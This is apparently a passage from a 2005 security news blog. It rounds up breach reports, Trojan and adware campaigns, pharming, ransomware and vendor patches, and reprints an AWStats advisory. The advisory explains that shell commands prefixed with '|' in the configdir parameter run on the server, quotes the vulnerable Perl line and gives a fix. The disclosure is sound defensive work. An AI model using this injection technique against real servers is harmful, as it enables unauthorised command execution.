"Port scanning is an activity that may be indicative of an attempt to discover attack vectors against any vendor product and is not an activity unique to Microsoft products," she added.
She said software engineers at Redmond would continue to analyze and monitor for any malicious activity but stressed that she was not aware of any customers being attacked via sniffing against TCP Port 445 and have not received any indication of malicious activity associated with MS05-027.

Wednesday, June 22, 2005
PROVIDENCE, R.I. - A security hole that allowed easy access to the purchase information of millions of CVS Corp.'s loyalty card customers prompted the company to pull Internet access to the data on Tuesday.
The Woonsocket-based drugstore chain, which has issued 50 million of the cards, said it would restore Web-based access to the information after it creates additional security hurdles.
The data security flaw in the ExtraCare card service was exposed Monday by the grassroots group Consumers Against Supermarket Privacy Invasion and Numbering, or CASPIAN.
It said anyone could learn what a customer had purchased with an ExtraCare card by logging on to a company Web site with the card number, the customer's zip code and first three letters of the customer's last name.
Full Article

Saturday, June 18, 2005
The FDIC has notified former and current employees of the agency that personal data including name, date of birth, salary, Social Security number and other information had been stolen several months ago.
Although the data theft was discovered in March and letters were sent to affected employees at that time, the FBI subsequently found that data of all former and current Federal Deposit Insurance Corp. employees—not only those notified by the FDIC in March—had been compromised.
Not only is the security breach embarrassing for the FDIC, it's also ironic, because the FDIC's job is to issue alerts to financial institutions about how to handle sensitive information, said Gerry Gebel, senior analyst at Burton Group, a Midvale, Utah, research and advisory firm.
The security breach at the FDIC is just the latest in a series of high-profile cases of identity thefts.
In March, for example, Bank of America Corp. lost several data tapes containing personal information on more than 1 million federal employees.
Also in March, BJ's Wholesale Club Inc. disclosed that customer information was compromised—something the Federal Trade Commission attributes to the wholesale club failing to encrypt data.
To help stem the rising tide of identity theft, Congress is currently mulling over several potential laws that, similar to California SB 1386 and those in process in several other states, would require organizations disclose any unauthorized acquisition of information.
In the U.S. Senate, Dianne Feinstein, D-Calif., has introduced such a bill, dubbed the Notification of Risk to Personal Data Act.
Meanwhile, U.S. Rep. Melissa L. Bean, D-Ill., has introduced a companion bill that would require the government or any business that owns or licenses electronic data containing personal information to notify anybody whose personal information has been compromised. The bills also would create a clearinghouse to collect, track and report data breaches.
Sens. Charles Schumer, D-N.Y., and Bill Nelson, D-Fla., also introduced an identity theft bill that would give broader authority to the Federal Trade Commission and require more disclosure.
The Schumer-Nelson ID Theft Prevention Bill will create an FTC Office of Identity Theft to help victims of ID theft reclaim their identities more easily, regulate data merchants, and force companies to inform consumers in plain English that their information may be sold or given to an unaffiliated third party without their consent unless a box is checked.
A report on Trojan e-mail attacks against critical-infrastructure systems in the U.K. highlights an emerging trend away from mass-mailing worms and viruses to far more targeted ones, analysts said.
The U.K.'s National Infrastructure Security Co-Ordination Center yesterday released a report (PDF format) disclosing that more than 300 government departments and businesses were targeted by a continuing series of e-mail attacks designed to covertly gather sensitive and economically valuable information (see story).
Unlike with phishing and mass-mailing worms, the attackers appear to be going after specific individuals who have access to commercially or economically privileged information, the report said.
The attacks involved the use of e-mails containing so-called Trojan programs or links to Web sites containing Trojan files. Once installed on a user's system, Trojans covertly run in the background and perform a variety of functions, including collecting usernames, passwords and system information; scanning of drives; and uploading of documents and data to remote computers.
"The e-mails use social engineering to appear credible, with subject lines often referring to news articles that would be of interest to the recipient," the report said. "In fact, they are 'spoofed,' making them appear to originate from trusted contacts, news agencies or government departments."
The report highlights how hackers are starting to tailor their attacks and go after specific high-value targets instead of simply launching mass-mailing worms and viruses, said Mark Sunner, chief technology officer at MessageLabs Ltd., a New York-based provider of e-mail security services.
BitTorrent, the beloved file-sharing client and protocol that provides a way around bandwidth bottlenecks, has become the newest distribution vehicle for adware/spyware bundles.
Public peer-to-peer networks have always been associated with adware program distributions, but BitTorrent, the program created by Bram Cohen to offer a new approach to sharing digital files, has managed to avoid the stigma.
According to Chris Boyd, a renowned security researcher who runs the VitalSecurity.org nonprofit resource center, the warm and fuzzy world of BitTorrent has been invaded by a massive software distribution campaign linked to New York-based adware purveyor Direct Revenue LLC.
"This is the marketing campaign to end all marketing campaigns," said Boyd, the Microsoft Security MVP (most valuable professional) known throughout the security industry by the "Paperghost" moniker.
Boyd, widely known for chronicling spyware, hacking and malware exploits, has published details of the BitTorrent distributions and identified Direct Revenue and Marketing Metrix Group as the companies responsible for the rigged files.
Boyd said he got the first inkling that BitTorrent was a major adware distribution vehicle while searching for the source of Direct Revenue's Aurora, an adware program that includes the prevalent "nail.exe" component. Sifting through mountains of HijackThis logs posted on security forums, Boyd said the answer was staring him in the face. (HijackThis is a popular freeware spyware removal tool that keeps detailed logs of Windows PC scans).
A BitTorrent user downloading a movie clip only becomes aware of the associated adware after the files are reassembled. At that stage, when the user attempts to load the reassembled file, he or she is greeted by an installation notice for an adware bundle distributed by MMG (Marketing Metrix Group), a Canadian company that specializes in P2P network marketing.
Officials from MMG did not respond to queries for comment. On its Web site, the company lists BitTorrent as a lucrative adware distribution vehicle. "Although Bit Torrent is a file format and not a P2P Network … [it] is the fastest growing protocol for file sharing online. Many top Bit Torrent sites such as SuprNova, Lokitorren and Bit Tower support millions of downloads daily," said MMG, which lists PartyPoker.com and Hotbar.com among other clients on its roster.
MasterCard International on Friday said a security breach of credit card payment data had exposed about 40 million cards of all brands to potential fraud in what one analyst said was the biggest privacy breach ever.
About 13.9 million of those credit cards at risk are MasterCard-branded cards, the company said. An unauthorized person infiltrated cardholder data at a company which processes transactions.
There have been a string of episodes this year in which companies have reported stolen or misappropriated customer data. Bank of America Corp., ChoicePoint Inc. and Reed Elsevier's are some of the companies that have reported breaches.
MasterCard International said its security staff identified the breach at Tucson-based CardSystems Solutions Inc., a third-party processor of payment card data. Third party processors process transactions on behalf of financial institutions and merchants.
MasterCard said security vulnerabilities in CardSystems processor's systems allowed an unauthorized individual to infiltrate CardSystems' network and access cardholder data.
CardSystems has already taken steps to improve the security of its system, MasterCard said it was giving the company "a limited amount of time" to demonstrate compliance with MasterCard security requirements.
MasterCard said it immediately notified its customer banks of specific card accounts that may have been subject to compromise so they can take the measures to protect their cardholders.

Monday, June 13, 2005
Trojan horse programs were in the news again this week, as the Israeli newspaper Haaretz published news of a massive industrial espionage ring that used custom-designed Trojans to steal trade secrets and other sensitive information from leading companies.
The case illustrates the growing threat to enterprises from surreptitious monitoring programs, which are increasingly being used in sophisticated and coordinated attacks. While news of virus and worm outbreaks still dominates the headlines, Trojans could be a silent epidemic affecting untold numbers of companies, according to one leading malicious code researcher.
Full Article
Updated: A security researcher says Google's search-based ads play a part in browser toolbars that violate the company's stand against spyware and questionable download practices.
Google's sponsored-link ads may have helped turn the world's best-known search engine into a financial powerhouse, but they also are coming under attack for contributing to spyware practices that undermine trust on the Web.
Anti-spyware researcher Ben Edelman this week criticized Google Inc. for playing a role in the distribution of browser toolbars that he says violates Google's own principle about software downloads.
Read full Article Here
AWStats Remote Command Execution Vulnerability
iDEFENSE Security Advisory 01.17.05:
I. BACKGROUND
AWStats is a free tool that generates advanced web, ftp or mail server
statistics, graphically. More information about AWStats is available
from:
http://awstats.sourceforge.net
II. DESCRIPTION
Remote exploitation of an input validation vulnerability in AWStats
allows attackers to execute arbitrary commands under the privileges of
the web server.
The problem specifically exists when the application is running as a
CGI script on a web server. The "configdir" parameter contains
unfiltered user-supplied data that is utilized in a call to the Perl
routine open() as can be seen here on line 1082 of awstats.pl:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf"))
The "searchdir" variables hold the value of the parameter provided by
the attacker from "configdir." An attacker can cause arbitrary commands
to be executed by prefixing them with the "|" character.
V. WORKAROUND
Add a filter around the "configdir" parameter by replacing the following
line:
if ($QueryString =~ /configdir=([^&]+)/i)
{
$DirConfig=&DecodeEncodedString("$1");
}
With:
if ($QueryString =~ /configdir=([^&]+)/i)
{
$DirConfig=&DecodeEncodedString("$1");
$DirConfig=~tr/a-z0-9_\-\/\./a-z0-9_\-\/\./cd;
}

Saturday, June 11, 2005
AMSTERDAM - E-mails claiming pop star Michael Jackson, on trial on sex abuse charges, has tried to kill himself are being spread by hackers as a means to break into computers, a British anti-virus firm said on Friday.
The hackers have sent emails with the subject "Re: Suicidal attempt" and the message text: "Last night, while in his Neverland Ranch, Michael Jackson has made a suicidal attempt", said security software specialists at Sophos.
The email asks recipients to click on a link that takes them to a Web site which secretly installs malicious code on their computers.
"If you click on the link, the Web site displays a message saying it is too busy, which may not surprise people who think it might contain genuine breaking news about Michael Jackson," said Carole Theriault, security consultant at SophosLabs.

Thursday, June 09, 2005
DNS poisoning requires elite hacking skills, which is why most analysts believe it falls short of a large-scale threat. But before you get too complacent, take notice of the poor man's pharm, a less sophisticated and far less costly way to hijack Web page requests and forward unsuspecting users to counterfeit sites.
Instead of harvesting requests from a DNS server, the "retail" version of pharming is a desktop affair in which a user unwittingly downloads spyware, a Trojan horse or a virus. This malware simply intercepts Web site requests and shunts the user to a bogus Web site. The rest is the now too familiar game of capturing your personal information and then redirecting you to the authentic site. Some say such low-rent pharming accounts for the vast majority of incidents. "The bad guys are always trying to stay low enough in the food chain to escape notice but high enough to make money,"
Another technique, somewhere between DNS poisoning and desktop hijacking, involves search engines. This scam takes advantage of the fact that users forget URLs -- for a bank Web site, for example. The user conducts a search on Google, gets a page of results, and clicks the first one that looks right. But in fact it's a bogus site.
"If you can tag your site so it shows at the top of a search query result page, you can be in the pharming business," said Jim Stickley, chief technology officer and co-founder of TraceSecurity. "This is what legitimate businesses do all the time -- namely, optimize their sites for various search engines."
Apple on Wednesday posted Security Update 2005-006. The new update is ready for download from Apple’s Web site. Separate downloads are available for Mac OS X v10.3.9 and Mac OS X v10.4.1. Apple said the download is recommended for all affected Mac users.
The security update for Mac OS X v10.4.1 contains those Bluetooth and PHP improvements, as well as a buffer overflow correction and other improvements to AFP Server, correct handling of cleanup of poorly-formatted PDF documents by CoreGraphics and a security improvement to prevent unprivileged users from launching commands into root sessions; more secure folder permissions to protect the cache folder and Dashboard system widgets; removal of a vulnerability in the launchd command; a correction to LaunchServices’ query code; a change to MCX client involving Portable Home Directories; modification of NFS exporting code; and correction of a buffer overflow problem in “vpnd.” More details are available from Apple’s Web site.

Wednesday, June 08, 2005
New versions of the Mozilla Foundation's browsers have reintroduced a 7-year-old flaw that makes them vulnerable to spoofing attacks, security advisory company Secunia said yesterday.
Secunia first publicized the flaw last summer, warning that a feature built into most browsers for years was a security liability. The firm argued that a feature allowing one Web page to load arbitrary content into a frame of another page could allow an attacker to, for example, substitute his own log-in window on a bank's Web site. The feature was found in Internet Explorer, Mozilla, Opera, Safari and Mozilla derivatives such as Konqueror.
"We believe that it is important that Microsoft and the other vendors seriously consider the minor gains from such 'functionality' against the possible consequences for their customers," said Secunia Chief Technology Officer Thomas Kristensen last summer at the time of the flaw. "In our opinion, this is a vulnerability and should be treated as such, whether the vendors implemented this intentionally or not."
The Mozilla Project said it is investigating the report, and a moderator of the organization's online support site said the flaw had not been exploited. "To protect yourself, close all other windows/tabs before accessing a site where you routinely put in a secure password (your bank or PayPal account), or your bank or credit card details (e.g., Amazon), or other sensitive data," the moderator said.

Friday, June 03, 2005
A new version of the Netscape Web browser is being criticized by spyware experts for failing to notify Web surfers when they're visiting Web sites that distribute the noxious monitoring programs.
Netscape 8's Trust Rating System, which warns users about insecure Web sites, gives a "green light" to Web sites that download spyware onto users' machines, according to Ben Edelman, a student at Harvard University Law School and an expert on spyware software.
In a conversation Wednesday, AOL spokesman Andrew Weinstein acknowledged that some spyware sites received an "unknown" rating from the browser. The spokesman subsequently confirmed evidence viewed by eWEEK magazine suggesting that other spyware sites received a "trusted" rating. The company is working to correct the problem with the new browser.
The critiques are the latest bump in the road for Netscape 8, which was released this month. It was patched almost immediately to cover a host of known holes in its code, which is based on the popular Firefox browser, and to fix a conflict with Microsoft's Internet Explorer browser.
UPDATED: In an advisory posted by enterprise IM vendor IMlogic Wednesday, officials warned of a new worm (define) spread by old means: getting users to click on a URL (define) that purports to come from a friend on their buddy list.
The latest threat to AOL's instant messaging (IM) platform, AIM, again targets users' penchants to blindly click on links supplied by friends. The Gpic.aol worm comes with a message saying, "damn this looks just like me lol" and a link to what is displayed as pictures.google.com.
In reality, the displayed URL obscures the real Web site at newpeople.no-ip.info, which then downloads onto the user's system, collects the names in the buddy list and sends the same message to all of them.
Gpic.aol is considered a medium-level risk threat; it doesn't actually deliver a payload that allows the malware (define) writer to gain remote access to the computer or corrupt or erase data on the hard drive.
A four-member panel of cybercrime fighters dissected the ominous "phishing without a lure" pharming attacks in an "eCrime Calling" workshop at the InBox e-mail security conference here, co-sponsored by the Anti-Phishing Working Group.
Oliver Friedrichs, security manager at Symantec Corp.'s security response center, said the increase in pharming attacks has produced a steep rise in cybercrime statistics.The company's DeepSight global Internet sensor network recorded a 360% increase in phishing or pharming e-mails during the last half of 2004. DeepSight's 2 million honeypots and 4,000 devices recorded 9 million phishing e-mails for the last half of 2004, dwarfing the 2 million identified in last year's first six months. In a phishing scam, e-mail messages that look like they come from a legitimate Web site, such as a bank, are sent to users to lure them into entering sensitive information.
DeepSight analysis shows that 54% of all malware is designed to harvest confidential information from users, up from 44% in the second half of 2004 and 36% in the first half, Friedrichs said. Once infected, the top targets of the botnets are financial services companies followed by manufacturers. "Full Story"

Friday, May 27, 2005
The
Trojan downloader (download-aag AKA
Pgpcoder) exploits a well-known Internet Explorer vulnerability (
MS04-023) to download hostile code onto vulnerable Windows boxes. It then searches for files with various extensions and encodes them. The original documents are deleted and the newly encoded files become unreadable. The malware also drops a message onto the system with instructions on how to buy the tool needed to decode the files, demanding payment of $200 from victims if they ever want to see their documents again.
Security experts are warning Internet users about a new piece of software that poses as a spyware-removal tool but is actually being used to persuade unsuspecting Internet users to download spyware programs and Trojans.
The program, SpywareNo, is installed on Internet users' computers without warning, can be difficult to remove and may be accompanied by malicious programs that hijack victims' Web browsers, according to interviews with spyware experts.
The company behind the new tool claims that it is the victim of unscrupulous online advertisers who bundle the product with noxious wares. Yet you will see nothing indicating that they have been a victim or disclaimer clearly defined on their site.
But at least one spyware expert says the new application is just the latest example of so-called "rogue anti-spyware" programs that exploit user naiveté and frustration with spyware.
SpywareNo is advertised as a desktop security software suite, with integrated firewall, application security and intrusion detection features, according to spywareno.com, the program's official Web site. Personally it certainly does not look that way.
This is a warning like with "SpywareAssassin" If I were SpywareNo and this actually happened as claimed I would be pushing out corrective measures on the front page of the company site. The FTC busted "SpywareAssassin" full article. As I am sure this is but a trend to dupe people. It took some time for FTC to act on spywareassassin, perhaps it is likely this is time frame these people will operate. The sad part is this only makes unknown software companies suspect. At the end of the day the only people to benefit long term are the large software vendors. Making it very hard for startups like LavaSoft and SpyBot which are offer great free apps which do work.

Thursday, May 26, 2005
The CIA is conducting a secretive war game, dubbed "Silent Horizon," this week to practice defending against an electronic assault on the same scale as the Sept. 11 terrorism attacks.
The three-day exercise, ending Thursday, was meant to test the ability of government and industry to respond to escalating Internet disruptions over many months, according to participants. They spoke on condition of anonymity because the CIA asked them not to disclose details of the sensitive exercise taking place in Charlottesville, Va., about two hours southwest of Washington.
The simulated attacks were carried out five years in the future by a fictional alliance of anti-American organizations, including anti-globalization hackers. The most serious damage was expected to be inflicted in the war game's closing hours.
The national security simulation was significant because its premise -- a devastating cyberattack that affects government and parts of the economy with the same magnitude as the Sept. 11, 2001, suicide hijackings -- contravenes assurances by U.S. counterterrorism experts that such far-reaching effects from a cyberattack are highly unlikely. Previous government simulations have modeled damage from cyberattacks more narrowly.
"You hear less and less about the digital Pearl Harbor," said Dennis McGrath, who helped run three similar war games for the Institute for Security Technology Studies at Dartmouth College. "What people call cyberterrorism, it's just not at the top of the list."
http://www.ists.dartmouth.edu/
TimesUnion

Monday, May 23, 2005
 |
The Microsoft Windows Malicious Software Removal Tool checks Windows XP, Windows 2000, and Windows Server 2003 computers for and helps remove infections by specific, prevalent malicious software—including Blaster, Sasser, and Mydoom. When the detection and removal process is complete, the tool displays a report describing the outcome, including which, if any, malicious software was detected and removed. The tool creates a log file named mrt.log in the %WINDIR%\debug folder. |
| This tool is not a replacement for an anti-virus product. To help protect your computer, you should use an anti-virus product. "Click Here" |
"Learn More" |
- Provides a comprehensive PC health service
Windows OneCare helps protect and maintain your computer with an integrated service that includes antivirus, firewall, PC maintenance, and data backup and restore functionality.
- Works automatically to help provide hassle-free protection and maintenance
Windows OneCare automatically takes care of key tasks such as running antivirus scans, updating the antivirus engine and virus definitions, updating the firewall, and running a monthly PC tune-up to improve and maintain your computer’s performance.
- Continuously evolves to help protect you from the latest threats
Because Windows OneCare is a service, you will not need to wait for a new version in order to be protected from new threats or to take advantage of new features. Windows OneCare updates itself automatically over the Internet so you always have the latest technology. |

Saturday, May 21, 2005
Wayne Cunningham noted that Ask Jeeves is a fairly big player in the adware market. I guess I should have known this, but last year Ask Jeeves
bought a company with the mild-mannered name of Interactive Holdings. But look behind the curtain and see what unsavory characters lurk. Interactive Holdings was a front for iWon, My Search, My Way, and My Web Search. Ask Jeeves doesn’t exactly hide the fact–you can find these companies
listed on the Ask Jeeves Web site.
My opinion of Ask Jeeves, never particularly high, has suffered a great deal due to this revelation, old news though it is. I’m generally amazed at how much financial backing adware companies get. I know that they are pulling in plenty of money, and I’ve heard of venture capitalists investing in them. But I don’t think the investors realize they are buying into a very short term business.


Friday, May 20, 2005
Leading the legislative pack, the governor of Washington signed an antisypware bill with serious penalties for violators. The law defines specific unlawful behavior, such as hijacking home and search pages, and displaying excessive numbers of pop-up ads. This law also takes on deceptive installation practices and software that reinstalls itself. The section on reinstallation makes it illegal to “Prevent, through intentionally deceptive means, an owner or operator’s reasonable efforts to block the installation or execution of, or to disable, computer software by causing the software that the owner or operator has properly removed or disabled automatically to reinstall or reactivate on the computer”. There’s some leeway in this section, since it requires “intentionally deceptive means”, which may be hard to prove in court.
Because it’s a Washington state law, violations have to occur in Washington for a prosecution to take place. But since it calls for one hundred thousand dollars in damages per violation, a lot of people may consider bringing their laptop on a vacation to the state.

Thursday, May 19, 2005
Published: February 9, 2005 | Updated: February 11, 2005
Microsoft is aware of exploit code available on the Internet that targets an issue addressed this week by Microsoft Security Bulletin MS05-009. Microsoft is not currently aware of any active attack utilizing this code or any customer impact. We will continue to actively monitor the situation and provide updated customer information and guidance as necessary.
Our investigation of this exploit code has verified that it does not affect users who have installed the MS05-009 update for both Microsoft Windows and MSN Messenger. Microsoft continues to recommend customers apply the MS05-009 updates to the affected products by enabling Automatic Updates in Windows as well as installing the updated version of MSN Messenger.
News Story by John E. Dunn

MAY 18, 2005 (IDG NEWS SERVICE) - Users of AOL’s instant messaging software, AIM, should be on the lookout for an innovative new worm variously named "Oscarbot-B" and "Doyorg" by antivirus companies. "Full Story".